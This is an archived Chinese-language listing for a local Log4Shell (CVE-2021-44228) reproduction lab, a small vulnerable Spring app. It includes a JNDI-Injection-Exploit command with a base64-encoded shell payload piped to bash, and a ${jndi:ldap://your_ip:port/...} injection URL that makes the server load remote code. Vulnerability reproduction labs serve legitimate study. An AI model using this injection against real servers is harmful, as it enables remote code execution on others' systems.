关联漏洞
描述
CVE-2021-44228 Vulnerability Reproduction Environment CVE-2021-44228 漏洞复现环境
介绍
## 访问
项目启动之后访问: http://127.0.0.1:9090/vul
## 漏洞复现
JDK 版本:java8u92 (避免使用过高的版本,建议同我一致,高版本对JNDI注入有一定限制)
```bash
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1
```
使用以上工具生成PAYLOAD。
访问 http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx}
文件快照
[4.0K] /data/pocs/3ef940c1b1d54fe4b907e0059caf390aa3a3bb80
├── [3.1K] pom.xml
├── [ 455] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] qwesec
│ ├── [4.0K] controller
│ │ └── [ 746] VulController.java
│ └── [ 319] Log4jDemoApplication.java
└── [4.0K] resources
├── [ 48] application.properties
└── [4.0K] static
└── [ 103] index.html
8 directories, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。